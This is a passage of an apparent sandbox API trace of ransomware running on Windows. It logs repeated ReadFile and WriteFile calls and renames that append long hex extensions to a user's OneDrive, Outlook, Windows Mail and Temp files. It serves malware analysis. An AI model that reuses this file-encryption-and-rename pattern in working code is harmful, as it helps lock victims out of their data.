lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll.992033272E5C21D188AE359B6BFD03EDB7798611D0DB384441A4EDEABA7ED942") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll.992033272E5C21D188AE359B6BFD03EDB7798611D0DB384441A4EDEABA7ED942" [0163.217] GetProcessHeap () returned 0x270000 [0163.217] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15a) returned 0x328878 [0163.217] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x422f7bc, FileInformation=0x328878, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0163.219] CloseHandle (hObject=0x594) returned 1 [0163.241] GetProcessHeap () returned 0x270000 [0163.243] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0163.243] RtlInterlockedCompareExchange64 () returned 0x2 [0163.243] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.349] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x3a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0163.349] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.350] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x3a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0163.351] RtlInterlockedCompareExchange64 () returned 0x1 [0163.351] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.358] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0163.359] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log", lpString2=".AE01B803049A4E97A6EC20A9FFC62FDE2038C771046FE1DCEEF10E409F485401" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log.AE01B803049A4E97A6EC20A9FFC62FDE2038C771046FE1DCEEF10E409F485401") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log.AE01B803049A4E97A6EC20A9FFC62FDE2038C771046FE1DCEEF10E409F485401" [0163.359] GetProcessHeap () returned 0x270000 [0163.359] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x178) returned 0x427b198 [0163.360] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x422f7bc, FileInformation=0x427b198, Length=0x178, FileInformationClass=0xa) returned 0x0 [0163.361] CloseHandle (hObject=0x5b8) returned 1 [0163.365] GetProcessHeap () returned 0x270000 [0163.367] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.375] RtlInterlockedCompareExchange64 () returned 0x1 [0163.375] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.561] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0163.562] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.564] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0163.565] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat", lpString2=".C698166EA5557F9D07678CCB6F95A34A462713EA43B26B703477BD2E014E5B76" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat.C698166EA5557F9D07678CCB6F95A34A462713EA43B26B703477BD2E014E5B76") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat.C698166EA5557F9D07678CCB6F95A34A462713EA43B26B703477BD2E014E5B76" [0163.565] GetProcessHeap () returned 0x270000 [0163.565] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a6) returned 0x4278f60 [0163.565] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x422f7bc, FileInformation=0x4278f60, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0163.567] CloseHandle (hObject=0x5b8) returned 1 [0163.570] GetProcessHeap () returned 0x270000 [0163.571] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.571] RtlInterlockedCompareExchange64 () returned 0x1 [0163.571] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.578] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0163.578] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.580] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0163.581] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat", lpString2=".391D2D9ECCC99FBBB2486629A2A876A8D1C7A0E0F9D8B2DCCED4ADD9B15C2456" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat.391D2D9ECCC99FBBB2486629A2A876A8D1C7A0E0F9D8B2DCCED4ADD9B15C2456") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat.391D2D9ECCC99FBBB2486629A2A876A8D1C7A0E0F9D8B2DCCED4ADD9B15C2456" [0163.581] GetProcessHeap () returned 0x270000 [0163.581] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x4279118 [0163.581] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x422f7bc, FileInformation=0x4279118, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0163.584] CloseHandle (hObject=0x5b8) returned 1 [0163.587] GetProcessHeap () returned 0x270000 [0163.589] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.589] RtlInterlockedCompareExchange64 () returned 0x1 [0163.589] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.621] ReadFile (in: hFile=0x594, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0163.622] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.623] WriteFile (in: hFile=0x594, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0163.624] RtlInterlockedCompareExchange64 () returned 0x0 [0163.625] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.626] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0163.627] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log", lpString2=".22A7C07E782B11B75985FF0E34034D8E12154D1801A6CB191B9B3CDB1037AA19" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.22A7C07E782B11B75985FF0E34034D8E12154D1801A6CB191B9B3CDB1037AA19") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.22A7C07E782B11B75985FF0E34034D8E12154D1801A6CB191B9B3CDB1037AA19" [0163.627] GetProcessHeap () returned 0x270000 [0163.627] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15e) returned 0x3289e0 [0163.627] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x422f7bc, FileInformation=0x3289e0, Length=0x15e, FileInformationClass=0xa) returned 0x0 [0163.629] CloseHandle (hObject=0x594) returned 1 [0163.669] GetProcessHeap () returned 0x270000 [0163.670] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.670] RtlInterlockedCompareExchange64 () returned 0x1 [0163.671] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.763] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0163.764] RtlInterlockedCompareExchange64 () returned 0x0 [0163.764] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.939] ReadFile (in: hFile=0x5b8, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x5c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0163.948] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.950] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x7422118, ReturnLength=0x422f7cc) returned 0x0 [0163.951] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg", lpString2=".4ED9DB9169D9BFCBD9137AB221D06D7C2542E79006592DE2F941F32915F53066" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.4ED9DB9169D9BFCBD9137AB221D06D7C2542E79006592DE2F941F32915F53066") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.4ED9DB9169D9BFCBD9137AB221D06D7C2542E79006592DE2F941F32915F53066" [0163.951] GetProcessHeap () returned 0x270000 [0163.951] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15a) returned 0x42fb210 [0163.951] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x422f7bc, FileInformation=0x42fb210, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0163.953] CloseHandle (hObject=0x5b8) returned 1 [0163.954] GetProcessHeap () returned 0x270000 [0163.956] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0163.957] RtlInterlockedCompareExchange64 () returned 0x1 [0163.957] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.958] WriteFile (in: hFile=0x5b0, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0163.963] RtlInterlockedCompareExchange64 () returned 0x0 [0163.963] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.967] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x750a220, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x750a220, ReturnLength=0x422f7cc) returned 0x0 [0163.968] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg", lpString2=".941DE0A2A1CD6B34794D1DC30364FF796E5D297647EE63819485A6F06EA11C3A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.941DE0A2A1CD6B34794D1DC30364FF796E5D297647EE63819485A6F06EA11C3A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.941DE0A2A1CD6B34794D1DC30364FF796E5D297647EE63819485A6F06EA11C3A" [0163.968] GetProcessHeap () returned 0x270000 [0163.968] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x168) returned 0x7421398 [0163.968] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x422f7bc, FileInformation=0x7421398, Length=0x168, FileInformationClass=0xa) returned 0x0 [0163.971] CloseHandle (hObject=0x5ac) returned 1 [0163.973] GetProcessHeap () returned 0x270000 [0163.975] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a170 | out: hHeap=0x270000) returned 1 [0163.981] RtlInterlockedCompareExchange64 () returned 0x3 [0163.981] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.061] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0164.061] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.064] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x7422118, ReturnLength=0x422f7cc) returned 0x0 [0164.065] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv", lpString2=".3ED4486FEAC278B63AEE46CB976C52F525DD338451E43638D2BC3563A6D0425B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv.3ED4486FEAC278B63AEE46CB976C52F525DD338451E43638D2BC3563A6D0425B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv.3ED4486FEAC278B63AEE46CB976C52F525DD338451E43638D2BC3563A6D0425B" [0164.065] GetProcessHeap () returned 0x270000 [0164.065] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4275ac0 [0164.065] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x422f7bc, FileInformation=0x4275ac0, Length=0x120, FileInformationClass=0xa) returned 0x0 [0164.066] CloseHandle (hObject=0x5b0) returned 1 [0164.071] GetProcessHeap () returned 0x270000 [0164.073] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.073] RtlInterlockedCompareExchange64 () returned 0x1 [0164.073] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.078] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0164.078] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.080] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x7422118, ReturnLength=0x422f7cc) returned 0x0 [0164.081] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav", lpString2=".E17CECC669CB9D9323D1A260E894AA4FD05E9C69C277B698F524D6A173D54301" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav.E17CECC669CB9D9323D1A260E894AA4FD05E9C69C277B698F524D6A173D54301") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav.E17CECC669CB9D9323D1A260E894AA4FD05E9C69C277B698F524D6A173D54301" [0164.082] GetProcessHeap () returned 0x270000 [0164.082] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x425ccb8 [0164.082] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x422f7bc, FileInformation=0x425ccb8, Length=0x122, FileInformationClass=0xa) returned 0x0 [0164.084] CloseHandle (hObject=0x5b0) returned 1 [0164.089] GetProcessHeap () returned 0x270000 [0164.090] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.090] RtlInterlockedCompareExchange64 () returned 0x1 [0164.090] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.095] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0164.095] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.096] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.097] RtlInterlockedCompareExchange64 () returned 0x0 [0164.097] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.114] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.116] RtlInterlockedCompareExchange64 () returned 0x0 [0164.116] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.141] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x7000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.143] RtlInterlockedCompareExchange64 () returned 0x0 [0164.143] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.156] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.157] RtlInterlockedCompareExchange64 () returned 0x0 [0164.157] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.169] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x6800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.171] RtlInterlockedCompareExchange64 () returned 0x0 [0164.171] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.427] ReadFile (in: hFile=0x5b0, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0164.428] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.428] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7618258, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x7618258, ReturnLength=0x422f7cc) returned 0x0 [0164.429] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3", lpString2=".9725BF9F8710E31BEED5C0644E7282337D227915FCA8958095714CBBE3931816" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3.9725BF9F8710E31BEED5C0644E7282337D227915FCA8958095714CBBE3931816") 